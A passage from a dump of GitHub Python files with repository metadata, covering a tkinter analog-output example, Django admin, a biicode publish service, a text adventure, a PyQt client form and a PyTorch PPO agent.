rate = 1000\n num_points = self.num_chans * points_per_channel\n scan_options = (ScanOptions.BACKGROUND |\n ScanOptions.CONTINUOUS | ScanOptions.SCALEDATA)\n ao_range = self.ao_props.available_ranges[0]\n\n self.memhandle = ul.scaled_win_buf_alloc(num_points)\n\n # Check if the buffer was successfully allocated\n if not self.memhandle:\n messagebox.showerror(\"Error\", \"Failed to allocate memory\")\n self.start_button[\"state\"] = tk.NORMAL\n return\n\n try:\n data_array = self.memhandle_as_ctypes_array_scaled(\n self.memhandle)\n frequencies = self.add_example_data(\n data_array, ao_range, self.num_chans, rate,\n points_per_channel)\n\n self.recreate_freq_frame()\n self.display_signal_info(frequencies)\n\n ul.a_out_scan(\n self.board_num, self.low_chan, self.high_chan, num_points,\n rate, ao_range, self.memhandle, scan_options)\n\n # Start updating the displayed values\n self.update_displayed_values()\n except ULError as e:\n self.show_ul_error(e)\n self.set_ui_idle_state()\n return\n\n def display_signal_info(self, frequencies):\n for channel_num in range(self.low_chan, self.high_chan + 1):\n curr_row = channel_num - self.low_chan\n self.freq_labels[curr_row][\"text\"] = str(\n frequencies[curr_row]) + \" Hz\"\n\n def add_example_data(self, data_array, ao_range, num_chans,\n rate, points_per_channel):\n # Calculate frequencies that will work well with the size of the array\n frequencies = []\n for channel_num in range(0, num_chans):\n frequencies.append(\n (channel_num + 1) / (points_per_channel / rate))\n\n # Calculate an amplitude and y-offset for the signal\n # to fill the analog output range\n amplitude = (ao_range.range_max - ao_range.range_min) / 2\n y_offset = (amplitude + ao_range.range_min) / 2\n\n # Fill the array with sine wave data at the calculated frequencies.\n # Note that since we are using the SCALEDATA option, the values\n # added to data_array are the actual voltage values that the device\n # will output\n data_index = 0\n for point_num in range(0, points_per_channel):\n for channel_num in range(0, num_chans):\n freq = frequencies[channel_num]\n value = amplitude * math.sin(\n 2 * math.pi * freq * point_num / rate) + y_offset\n data_array[data_index] = value\n data_index += 1\n\n return frequencies\n\n def update_displayed_values(self):\n # Get the status from the device\n status, curr_count, curr_index = ul.get_status(\n self.board_num, FunctionType.AOFUNCTION)\n\n # Display the status info\n self.update_status_labels(status, curr_count, curr_index)\n\n # Call this method again until the stop button is pressed\n if status == Status.RUNNING:\n self.after(100, self.update_displayed_values)\n else:\n # Free the allocated memory\n ul.win_buf_free(self.memhandle)\n self.set_ui_idle_state()\n\n def update_status_labels(self, status, curr_count, curr_index):\n if status == Status.IDLE:\n self.status_label[\"text\"] = \"Idle\"\n else:\n self.status_label[\"text\"] = \"Running\"\n\n self.index_label[\"text\"] = str(curr_index)\n self.count_label[\"text\"] = str(curr_count)\n\n def recreate_freq_frame(self):\n low_chan = self.low_chan\n high_chan = self.high_chan\n\n new_freq_frame = tk.Frame(self.freq_inner_frame)\n\n curr_row = 0\n self.freq_labels = []\n for chan_num in range(low_chan, high_chan + 1):\n curr_row += 1\n channel_label = tk.Label(new_freq_frame)\n channel_label[\"text\"] = (\n \"Channel \" + str(chan_num) + \" Frequency:\")\n channel_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n freq_label = tk.Label(new_freq_frame)\n freq_label.grid(row=curr_row, column=1, sticky=tk.W)\n self.freq_labels.append(freq_label)\n\n self.freq_frame.destroy()\n self.freq_frame = new_freq_frame\n self.freq_frame.grid()\n\n def stop(self):\n ul.stop_background(self.board_num, FunctionType.AOFUNCTION)\n\n def exit(self):\n self.stop()\n self.master.destroy()\n\n def set_ui_idle_state(self):\n self.high_channel_entry[\"state\"] = tk.NORMAL\n self.low_channel_entry[\"state\"] = tk.NORMAL\n self.start_button[\"command\"] = self.start\n self.start_button[\"text\"] = \"Start\"\n\n def start(self):\n self.high_channel_entry[\"state\"] = tk.DISABLED\n self.low_channel_entry[\"state\"] = tk.DISABLED\n self.start_button[\"command\"] = self.stop\n self.start_button[\"text\"] = \"Stop\"\n self.start_scan()\n\n def get_low_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.low_channel_entry.get())\n except ValueError:\n return 0\n\n def get_high_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.high_channel_entry.get())\n except ValueError:\n return 0\n\n def validate_channel_entry(self, p):\n if p == '':\n return True\n try:\n value = int(p)\n if(value < 0 or value > self.ao_props.num_chans - 1):\n return False\n except ValueError:\n return False\n\n return True\n\n def create_widgets(self):\n '''Create the tkinter UI'''\n example_supported = (\n self.ao_props.num_chans > 0\n and self.ao_props.supports_scan)\n\n if example_supported:\n main_frame = tk.Frame(self)\n main_frame.pack(fill=tk.X, anchor=tk.NW)\n\n if self.ao_props.num_chans > 1:\n channel_vcmd = self.register(self.validate_channel_entry)\n\n curr_row = 0\n low_channel_entry_label = tk.Label(main_frame)\n low_channel_entry_label[\"text\"] = \"Low Channel Number:\"\n low_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.low_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.low_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n high_channel_entry_label = tk.Label(main_frame)\n high_channel_entry_label[\"text\"] = \"High Channel Number:\"\n high_channel_entry_label.grid(\n row=curr_row, column=0, sticky=tk.W)\n\n self.high_channel_entry = tk.Spinbox(\n main_frame, from_=0,\n to=max(self.ao_props.num_chans - 1, 0),\n validate='key', validatecommand=(channel_vcmd, '%P'))\n self.high_channel_entry.grid(\n row=curr_row, column=1, sticky=tk.W)\n initial_value = min(self.ao_props.num_chans - 1, 3)\n self.high_channel_entry.delete(0, tk.END)\n self.high_channel_entry.insert(0, str(initial_value))\n\n scan_info_group = tk.LabelFrame(\n self, text=\"Scan Information\", padx=3, pady=3)\n scan_info_group.pack(fill=tk.X, anchor=tk.NW, padx=3, pady=3)\n\n scan_info_group.grid_columnconfigure(1, weight=1)\n\n curr_row += 1\n status_left_label = tk.Label(scan_info_group)\n status_left_label[\"text\"] = \"Status:\"\n status_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.status_label = tk.Label(scan_info_group)\n self.status_label[\"text\"] = \"Idle\"\n self.status_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n index_left_label = tk.Label(scan_info_group)\n index_left_label[\"text\"] = \"Index:\"\n index_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.index_label = tk.Label(scan_info_group)\n self.index_label[\"text\"] = \"-1\"\n self.index_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n count_left_label = tk.Label(scan_info_group)\n count_left_label[\"text\"] = \"Count:\"\n count_left_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n self.count_label = tk.Label(scan_info_group)\n self.count_label[\"text\"] = \"0\"\n self.count_label.grid(row=curr_row, column=1, sticky=tk.W)\n\n curr_row += 1\n self.freq_inner_frame = tk.Frame(scan_info_group)\n self.freq_inner_frame.grid(\n row=curr_row, column=0, columnspan=2, sticky=tk.W)\n\n self.freq_frame = tk.Frame(self.freq_inner_frame)\n self.freq_frame.grid()\n\n button_frame = tk.Frame(self)\n button_frame.pack(fill=tk.X, side=tk.RIGHT, anchor=tk.SE)\n\n self.start_button = tk.Button(button_frame)\n self.start_button[\"text\"] = \"Start\"\n self.start_button[\"command\"] = self.start\n self.start_button.grid(row=0, column=0, padx=3, pady=3)\n\n quit_button = tk.Button(button_frame)\n quit_button[\"text\"] = \"Quit\"\n quit_button[\"command\"] = self.exit\n quit_button.grid(row=0, column=1, padx=3, pady=3)\n\n\nif __name__ == \"__main__\":\n # Start the example\n ULAO04(master=tk.Tk()).mainloop()\n","repo_name":"GMUSatCom/GMU-Thermal-Vac","sub_path":"examples/ui/ULAO04.py","file_name":"ULAO04.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"17663169814","text":"import zipfile\n\nfrom django.contrib import admin\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport io\nfrom auth_and_perms import models\n\n@admin.action(description='Export Laboratory')\ndef export_rol_perms(admin, request, queryset):\n buffer = io.BytesIO()\n zip_file = zipfile.ZipFile(buffer, 'w')\n\n\n for rol in queryset:\n rols=models.ProfilePermission.objects.filter(rol=rol)\n zip_file.writestr(rol.name+\".json\", serializers.serialize('json', rols))\n zip_file.close()\n buffer.seek(0)\n response = HttpResponse(buffer.getvalue(),\n content_type='application/x-zip-compressed',\n headers={'Content-Disposition': 'attachment; filename=\"permissionsrol.zip\"'})\n return response\n\n\nclass RolAdmin(admin.ModelAdmin):\n filter_horizontal = ['permissions']\n actions = [export_rol_perms]\n\n\nclass AuthorizedApplicationAdmin(admin.ModelAdmin):\n list_display = ['name', 'auth_token']\n\n @admin.display(empty_value='unknown')\n def auth_token(self, obj):\n if obj.user:\n return obj.user.auth_token.key\n return 'unknown'\n\n\nadmin.site.register(models.AuthorizedApplication, AuthorizedApplicationAdmin)\nadmin.site.register(models.Profile)\nadmin.site.register(models.Rol, RolAdmin)\nadmin.site.register(models.ProfilePermission)","repo_name":"Solvosoft/organilab","sub_path":"src/auth_and_perms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"31155615417","text":"from biicode.server.model.block import Block\nfrom biicode.common.exception import (ForbiddenException, PublishException, NotFoundException,\n ServerInternalErrorException, NotInStoreException,\n BiiRequestErrorException, BiiServiceException,\n AlreadyInStoreException)\nfrom biicode.server.exception import DuplicateBlockException\nfrom biicode.common.utils.bii_logging import logger\nimport traceback\nfrom biicode.server.authorize import Security\nfrom biicode.common.model.block_info import BlockInfo\nfrom biicode.common.model.symbolic.block_version import BlockVersion\nfrom biicode.common.model.version_tag import DEV\n\n\nclass PublishService(object):\n ''' Service for publish blocks in server.'''\n def __init__(self, store, auth_user):\n self._store = store\n self.auth_user = auth_user\n self.security = Security(self.auth_user, self._store)\n\n def publish(self, publish_request):\n '''Performs a publication\n TIP: If we add publish_request to transaction_definition we can easily have asynchronous\n publications\n\n private: Only for first publication\n '''\n from biicode.server.background.enqueuer import register_publish\n\n if publish_request.tag == DEV:\n if not publish_request:\n raise BiiRequestErrorException('Up to date, nothing to publish')\n if publish_request.versiontag is not None:\n raise PublishException('A DEV version cannot have tag %s' % publish_request.tag)\n\n assert publish_request.deptable is not None\n\n # by default it is public\n # TODO: BLock creation is not handled in the transaction\n target_version = publish_request.parent\n user = self._store.read_user(target_version.block.owner)\n # Look if user has the block already created, because the block\n # can exist with -1 version if it has been created in web\n if target_version.block not in user.blocks.keys():\n try:\n if target_version != publish_request.parent: # Branching\n user = self.create_block(target_version.block,\n publish_request.parent, private=False)\n else:\n user = self.create_block(target_version.block, private=False)\n except DuplicateBlockException:\n pass # Its ok, already created\n\n target_block = target_version.block\n self._store.requestBlockTransaction(target_block)\n try:\n # If we can't read the block, we can't know about his existence\n self.security.check_read_block(target_block)\n self.security.check_publish_block(target_block, publish_request)\n # biiresponse.debug('Read block \"%s\"' % brl_block)\n block = self._store.read_block(target_block)\n (cells, contents,\n old_cells_ids, old_content_ids) = self._in_memory_block_update(block, publish_request)\n except ForbiddenException:\n self._store.finishBlockTransaction(target_block)\n raise\n except PublishException as e:\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException(e.message)\n except Exception as excp:\n logger.error(\"Exception in publish service!!: %s \" % str(excp))\n tb = traceback.format_exc()\n logger.error(tb)\n self._store.finishBlockTransaction(target_block)\n raise ServerInternalErrorException()\n\n self._store.beginBlockTransaction(target_block, cells, contents)\n try:\n self._write_resources_to_db(cells, contents, old_cells_ids, old_content_ids)\n self._store.update_block(block)\n self._store.commitBlockTransaction(target_block)\n register_publish(self.auth_user, block.last_version())\n self._store.finishBlockTransaction(target_block)\n\n # Need to read user again, otherwise will raise MongoNotCurrentObjectException\n # because of double update of same memory object\n user = self._store.read_user(target_version.block.owner)\n user.add_block_size_bytes(target_version.block, publish_request.bytes)\n # Save user (with block bytes updated)\n self._store.update_user(user)\n\n return block.last_version()\n\n except Exception as excp:\n tb = traceback.format_exc()\n logger.debug(tb)\n self._rollback_transaction(excp, target_block)\n raise ServerInternalErrorException('Publish transaction failed. Please, retry')\n\n def create_block(self, brl, private=False):\n '''Creates a block in server due the brl and description'''\n self.security.check_create_block(brl.owner, private)\n user = self._store.read_user(brl.owner)\n try:\n block_id = user.add_block(brl) # should fail if existing\n except DuplicateBlockException:\n logger.debug('Block %s already existing, not creating it' % brl)\n raise\n\n block = Block(block_id, brl)\n try: # FIXME: better upsert?\n self._store.create_block(block, private) # should fail if existing\n except AlreadyInStoreException:\n pass\n self._store.update_user(user) # raise exception if not current\n\n return user\n\n def _rollback_transaction(self, excp, brl_block):\n '''rollback transaction for publish'''\n logger.warning(str(excp) + '\\nRolling back publish transaction')\n self._store.rollBackBlockTransaction(brl_block)\n self._store.finishBlockTransaction(brl_block)\n\n def _write_resources_to_db(self, cells, contents, old_cells_ids, old_content_ids):\n '''Write cells and contents to db'''\n if old_cells_ids:\n self._store.delete_published_cells(old_cells_ids)\n if old_content_ids:\n self._store.delete_published_contents(old_content_ids)\n if cells:\n self._store.create_published_cells(cells)\n if contents:\n self._store.create_published_contents(contents)\n\n # @mongo_update_if_current_safe_retry\n # def __update_user_if_current(self, user):\n def _set_cell_roots(self, block, publish_request):\n '''Set cell root'''\n # Ensure here root assignment\n old_ids = {}\n deltas = block.deltas\n last_time = len(deltas) - 2\n\n for res in publish_request.cells:\n old_name = publish_request.renames.get_old_name(res.name.cell_name)\n old_id = block.cells.get_id(old_name, last_time)\n if old_id:\n old_ids[old_id] = res\n else:\n res.root = res.ID\n old_cells = self._store.read_published_cells(old_ids.keys())\n for old_id, old_cell in old_cells.iteritems():\n res = old_ids[old_id]\n res.root = old_cell.root\n\n def _in_memory_block_update(self, block, publish_request):\n '''Updates block in memory'''\n self.security.check_write_block(block.ID)\n cells, contents, old_cells_ids, old_content_ids = block.add_publication(publish_request,\n self.auth_user)\n self._set_cell_roots(block, publish_request)\n return cells, contents, old_cells_ids, old_content_ids\n\n def get_block_info(self, brl_block):\n '''Check if auth_user can publish a block version specified by parameter block_version\n Returns:\n BlockInfo\n '''\n\n try:\n self.security.check_read_block(brl_block)\n except NotInStoreException:\n # In this case, the block doesnt exist, but return information of -1 and permissions\n return self._get_new_block_info(brl_block)\n\n block_info = BlockInfo()\n try:\n self.security.check_write_block(brl_block)\n block_info.can_write = True\n except ForbiddenException:\n block_info.can_write = False\n\n try:\n block = self._store.read_block(brl_block)\n block_info.last_version = block.last_version()\n block_info.private = self.security.is_private(brl_block)\n except Exception as e:\n tb = traceback.format_exc()\n logger.debug(tb)\n logger.error(\"Something went wrong with %s\" % e)\n raise BiiServiceException('Something went wrong')\n\n return block_info\n\n def _get_new_block_info(self, brl_block):\n '''\n Returns BlockInfo that new block would have if we publish it.\n Raises exception if block cannot be created for any reason\n '''\n last_version = BlockVersion(brl_block, -1)\n can_write = False\n try:\n self.security.check_create_block(brl_block.owner)\n can_write = True\n except ForbiddenException:\n can_write = False\n except NotInStoreException:\n raise NotFoundException(\"Block %s not found!\" % brl_block.to_pretty())\n\n return BlockInfo(can_write=can_write, last_version=last_version)\n","repo_name":"biicode/bii-server","sub_path":"publish/publish_service.py","file_name":"publish_service.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"19"} +{"seq_id":"16942244441","text":"name = input('Type your name:')\nprint('Welcome',name,'to this adventure!')\n\nanswer = input ('You are on dirt road, it has come to an end and you can go left or right. Which way would you like to go?').lower()#Makes all the letters small for the program.\n\nif answer == 'left':\n answer = input(\"You come to a river, you can walk around it or swim across, walk or swim?\")\n\n if answer == \"swim\":\n print(\"You swam across and were eaten by an alligator.\")\n\n elif answer == \"walk\":\n print(\"You walked for many miles, ran out of water and lost the game\")\n \n\n else:\n print(\"Not a valid option. You lose.\")\n\n \n \nelif answer == \"right\":\n print (\"Not a valid option. You lose.\")\n","repo_name":"Baller321/Small-python-projects","sub_path":"choose_your_own_adventure.py","file_name":"choose_your_own_adventure.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28616212212","text":"# coding: latin-1\r\n__author__ = 'waldo'\r\nfrom gui import MdiWidget, CRUDWidget\r\nfrom ventanas import Ui_vtnCliente\r\nfrom validarDatos import ValidarDatos\r\nfrom baseDatos import Cliente as ClienteModel\r\nfrom baseDatos import Remito as RemitoModel\r\nfrom PyQt4 import QtGui\r\nclass Cliente(CRUDWidget, Ui_vtnCliente):\r\n \"\"\"\r\n Lógica del ABM de clientes.\r\n \"\"\"\r\n def __init__(self, mdi):\r\n \"\"\"\r\n Constructor de la clase Cliente.\r\n :param mdi:\r\n :return:\r\n \"\"\"\r\n MdiWidget.__init__(self, mdi)\r\n self.sesion = self.mdi().window().getSesionBD()\r\n self.validadores(ClienteModel)\r\n\r\n def cargarClientes(self):\r\n \"\"\"\r\n Carga los datos de los clientes en las tablas de las ventanas (Baja y Modificación).\r\n :return:\r\n \"\"\"\r\n self.cargarObjetos(self.tableClientes,\r\n ClienteModel.buscarTodos(\"dni\", self.sesion).all(),\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def crear(self):\r\n \"\"\"\r\n Da de alta un cliente nuevo y lo almacena en la base de datos.\r\n :return:\r\n \"\"\"\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n cliente = ClienteModel(str(self.lineDni.text()), str(self.lineNombre.text()),\r\n str(self.lineApellido.text()), str(self.lineDireccion.text()),\r\n str(self.lineTelefono.text()))\r\n if cliente.guardar(self.sesion):\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n cliente = ClienteModel.buscar(ClienteModel.dni, self.sesion,\r\n str(self.lineDni.text())).first()\r\n if cliente.getBaja():\r\n cliente.setBaja(False)\r\n cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El Cliente fue dado de alta.\")\r\n self.limpiarCampos()\r\n self.objectCreated.emit()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'El Cliente ya existe.', 'Aceptar')\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n\r\n def eliminar(self):\r\n \"\"\"\r\n Da de baja el cliente selecionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual==None:\r\n self.showMsjEstado(\"No se ha seleccionado ningun Cliente de la tabla\")\r\n else:\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n if self.bajaValida(dni):\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.borrar(self.sesion)\r\n self.showMsjEstado(\"El Cliente ha sido dado de baja\")\r\n self.tableClientes.removeRow(row)\r\n self.objectDeleted.emit()\r\n self.actualizar()\r\n else:\r\n QtGui.QMessageBox.critical(self, 'Error', 'Existen remitos pendientes de pago para dicho '\r\n 'Cliente.', 'Aceptar')\r\n\r\n def modificar(self):\r\n \"\"\"\r\n Modifica los datos del cliente seleccionado.\r\n :return:\r\n \"\"\"\r\n itemActual=self.tableClientes.currentItem()\r\n if itemActual!=None:\r\n if ValidarDatos.validarCamposVacios(self.camposRequeridos):\r\n row = itemActual.row()\r\n dni = str(self.tableClientes.item(row, 0).text())\r\n query = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, dni)\r\n for instance in query.all():\r\n self.cliente = instance\r\n self.cliente.setNombre(str(self.lineNombre.text()))\r\n self.cliente.setApellido(str(self.lineApellido.text()))\r\n self.cliente.setDireccion(str(self.lineDireccion.text()))\r\n self.cliente.setTelefono(str(self.lineTelefono.text()))\r\n self.cliente.modificar(self.sesion)\r\n self.showMsjEstado(\"El cliente fue modificado\")\r\n self.objectModified.emit()\r\n self.actualizar()\r\n else:\r\n self.showMsjEstado(\"Hay datos obligatorios que no fueron completados.\")\r\n else:\r\n self.showMsjEstado(\"No se ha seleccionado un Cliente de la tabla\")\r\n\r\n def bajaValida(self, dni):\r\n \"\"\"\r\n Verifica que el cliente no posea remitos sin pagar.\r\n :param dni: DNI del cliente para el cual se realiza la verificación.\r\n :return: bool\r\n \"\"\"\r\n remito = RemitoModel.buscarAlta(RemitoModel.cliente, self.sesion, dni).all()\r\n for r in remito:\r\n if r.getCobrado() == None:\r\n return False\r\n return True\r\n\r\n def cargarCamposBaja(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Baja).\r\n :return:\r\n \"\"\"\r\n self.lineNombre.setEnabled(False)\r\n self.lineApellido.setEnabled(False)\r\n self.cargarCamposMod()\r\n\r\n def buscar(self):\r\n \"\"\"\r\n Busca al cliente de acuerdo a la información ingresada y carga los datos en la tabla (Baja y Modificaión).\r\n :return:\r\n \"\"\"\r\n obj = self.sender().objectName()\r\n if obj == 'lineDni':\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif obj == 'lineNombre':\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif obj == 'lineApellido':\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n elif obj == 'btnBuscar':\r\n if str(self.lineDni.text()) != \"\":\r\n clientes = ClienteModel.buscarAlta(ClienteModel.dni, self.sesion, str(self.lineDni.text())).all()\r\n elif str(self.lineNombre.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.nombre, self.sesion,\r\n str(self.lineNombre.text())).all()\r\n elif str(self.lineApellido.text()) != \"\":\r\n clientes = ClienteModel.buscarLike(ClienteModel.apellido, self.sesion,\r\n str(self.lineApellido.text())).all()\r\n else:\r\n self.showMsjEstado(\"Ingrese DNI, Nombre o Apellido del Cliente para realizar la\"\r\n \" busqueda.\")\r\n return\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarObjetos(self.tableClientes, clientes,\r\n (\"dni\", \"nombre\", \"apellido\", \"direccion\", \"telefono\")\r\n )\r\n\r\n def actualizar(self):\r\n \"\"\"\r\n Actualiza los componentes de las ventanas.\r\n :return:\r\n \"\"\"\r\n self.limpiarCampos()\r\n self.limpiarTabla(self.tableClientes)\r\n self.cargarClientes()\r\n\r\n def limpiarCampos(self):\r\n \"\"\"\r\n Vacia los campos de la ventana.\r\n :return:\r\n \"\"\"\r\n self.lineDni.clear()\r\n self.lineDni.setEnabled(True)\r\n self.lineNombre.clear()\r\n self.lineNombre.setEnabled(True)\r\n self.lineApellido.clear()\r\n self.lineApellido.setEnabled(True)\r\n self.lineDireccion.clear()\r\n self.lineTelefono.clear()\r\n self.tableClientes.setCurrentItem(None)\r\n\r\n def cargarCamposMod(self):\r\n \"\"\"\r\n Carga los campos con los datos del cliente seleccionado (Modificación).\r\n :return:\r\n \"\"\"\r\n self.lineDni.setEnabled(False)\r\n row=self.tableClientes.currentItem().row()\r\n infoItem=[]\r\n for col in range(0,self.tableClientes.columnCount()):\r\n infoItem.append(self.tableClientes.item(row,col).text())\r\n #Cargar la info del item en los lines\r\n self.lineDni.setText(infoItem[0])\r\n self.lineNombre.setText(infoItem[1])\r\n self.lineApellido.setText(infoItem[2])\r\n self.lineDireccion.setText(infoItem[3])\r\n self.lineTelefono.setText(infoItem[4])\r\n\r\n @classmethod\r\n def create(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Alta Cliente.\r\n :param mdi: referencia a la ventana Alta Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).create(mdi)\r\n gui.groupBuscar.hide()\r\n gui.btnBuscar.hide()\r\n gui.btnAceptar.pressed.connect(gui.crear)\r\n gui.btnCancelar.pressed.connect(gui.limpiarCampos)\r\n return gui\r\n\r\n @classmethod\r\n def delete(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Baja Cliente.\r\n :param mdi: referencia a la ventana Baja Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).delete(mdi)\r\n gui.lineDireccion.setEnabled(False)\r\n gui.lineTelefono.setEnabled(False)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.cargarClientes()\r\n gui.btnAceptar.pressed.connect(gui.eliminar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposBaja)\r\n return gui\r\n\r\n @classmethod\r\n def update(cls, mdi):\r\n \"\"\"\r\n Configuración de la ventana Modificación Cliente.\r\n :param mdi: referencia a la ventana Modificación Cliente.\r\n :return: gui\r\n \"\"\"\r\n gui = super(Cliente, cls).update(mdi)\r\n gui.cargarClientes()\r\n gui.tableClientes.itemClicked.connect(gui.cargarCamposMod)\r\n gui.lineDni.returnPressed.connect(gui.buscar)\r\n gui.lineNombre.returnPressed.connect(gui.buscar)\r\n gui.lineApellido.returnPressed.connect(gui.buscar)\r\n gui.btnAceptar.pressed.connect(gui.modificar)\r\n gui.btnCancelar.pressed.connect(gui.actualizar)\r\n gui.btnBuscar.pressed.connect(gui.buscar)\r\n return gui\r\n\r\n","repo_name":"UNPSJB/FarmaciaCrisol","sub_path":"gestionClientes/lgClientes.py","file_name":"lgClientes.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5164916032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom Network import Actor, Critic\n\nclass PPO:\n def __init__(self,\n s_dim=3,\n a_dim=1,\n bound=2,\n actor_lr=1e-4,\n critic_lr=2e-4,\n update_step_a=10,\n update_step_c=10,\n gamma=0.9,\n epsilon=0.2):\n # Parameter initialization\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.bound = bound\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.update_step_a = update_step_a\n self.update_step_c = update_step_c\n self.gamma = gamma\n self.epsilon = epsilon\n\n # network initialization\n self.actor = Actor(s_dim, a_dim, bound)\n self.actor_old = Actor(s_dim, a_dim, bound)\n self.actor_old.load_state_dict(self.actor.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=self.actor_lr)\n self.critic = Critic(s_dim)\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=self.critic_lr)\n\n # memory initialization\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def get_action(self, s):\n # select action w.r.t the actions prob\n s = torch.FloatTensor(s)\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n a = dist.sample()\n a = torch.clamp(a, -self.bound, self.bound)\n return a.item()\n\n def get_v(self, s):\n # the state value\n s = torch.FloatTensor(s)\n with torch.no_grad():\n v = self.critic(s)\n return v.item()\n\n def calculate_log_prob(self, s, a, old=False):\n # s.shape = [batch, s_dim], a.shape = [batch, a_dim]\n # mu.shape = sigma.shape = log_prob.shape = [batch, a_dim]\n if old:\n with torch.no_grad():\n mu, sigma = self.actor_old(s)\n else:\n mu, sigma = self.actor(s)\n dist = Normal(loc=mu, scale=sigma)\n log_prob = dist.log_prob(a)\n return log_prob\n\n def learn(self, s, a, s_, r, done):\n # store transition\n self.memory_s.append(s)\n self.memory_a.append(a)\n self.memory_r.append(r)\n if done:\n # calculate the discounted reward\n discounted_r = []\n v_ = self.get_v(s_)\n for t in range(len(self.memory_r) - 1, -1, -1):\n v_ = self.memory_r[t] + self.gamma * v_\n discounted_r.insert(0, v_)\n s = torch.FloatTensor(self.memory_s)\n a = torch.FloatTensor(self.memory_a).unsqueeze(dim=-1)\n r = torch.FloatTensor(discounted_r).unsqueeze(dim=-1)\n # start to update network\n self.actor_old.load_state_dict(self.actor.state_dict())\n old_log_prob = self.calculate_log_prob(s, a, old=True)\n with torch.no_grad():\n advantage = r - self.critic(s)\n for _ in range(self.update_step_a):\n self.update_actor(s, a, advantage, old_log_prob)\n for _ in range(self.update_step_c):\n self.update_critic(s, r)\n # empty the memory\n self.memory_s, self.memory_a, self.memory_r = [], [], []\n\n def update_actor(self, s, a, advantage, old_log_prob):\n # calculate the loss\n log_prob = self.calculate_log_prob(s, a)\n ratio = torch.exp(log_prob - old_log_prob)\n surr1 = ratio*advantage\n surr2 = torch.clamp(ratio, 1.0 - self.epsilon,\n 1.0 + self.epsilon) * advantage\n loss = -torch.mean(torch.min(surr1, surr2))\n # update\n self.actor_opt.zero_grad()\n loss.backward()\n self.actor_opt.step()\n\n def update_critic(self, s, r):\n # calculate critic loss\n v = self.critic(s)\n advantage = r - v\n loss = torch.mean(advantage**2)\n # update\n self.critic_opt.zero_grad()\n loss.backward()\n self.critic_opt.step()","repo_name":"Parisfal/DRL-Pytorch-Tutorial","sub_path":"4.1 PPO1/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"70486599404","text":"import os \nimport csv \nimport time\nimport pandas as pd \nimport numpy as np \n\"\"\"\ndesc1: 数据清洗脚本\ndesc: 